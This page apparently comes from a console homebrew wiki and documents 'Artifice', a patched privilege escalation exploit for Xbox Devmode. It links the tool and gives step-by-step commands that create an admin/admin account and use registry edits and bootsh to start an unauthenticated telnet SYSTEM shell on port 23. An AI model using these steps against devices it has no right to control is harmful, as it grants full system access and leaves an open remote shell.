Skip to content

Artifice / Devmode privilege escalation exploit

Metadata
Release date 10.09.2023
Author Kudayasu
Classification Devmode SystemOS privilege escalation
Patched Yes
Patch date 08/28/2024
First patched system version 10.0.26100.1968 (xb_flt_2408ge.240821-1830)
Source https://kudayasu.github.io/an-autopsy-of-artifice/
Download https://github.com/Kudayasu/Artifice/releases/latest

Info

A completely privilege escalation exploit for Devmode, granting an admin account in SystemOS.

Prerequisites

  • Windows host computer
  • Console in devmode (UWP devkit or superior)

Instructions

Download the artifice release, make sure your console is reachable from the host computer, run the program and type the console IP. Then launch the exploit. If it succeeds, an account called admin with password admin will be created in SystemOS. You can ssh to this account.

System Shell Access

In order to gain SYSTEM shell access, we need to leverage bootsh to telnet into the Xbox, as described here.

  1. SSH into your console using Command Prompt or PowerShell with the Admin account created by Artiface.
  2. Execute the following commands on the SSH connection as Admin: 
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "telnetd.exe cmd.exe 23" /f
sc start bootsh
  3. Wait around 10 seconds to ensure that the telnet service has started.
  4. Reset the registry key back to its original state: 
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "xrun.exe SystemBootTasks" /f
  5. Now you can start a telnet session using PuTTY or a similar telnet client using Port 23
  6. Profit.
Authors: Helloyunho, Mick, Stern, Torus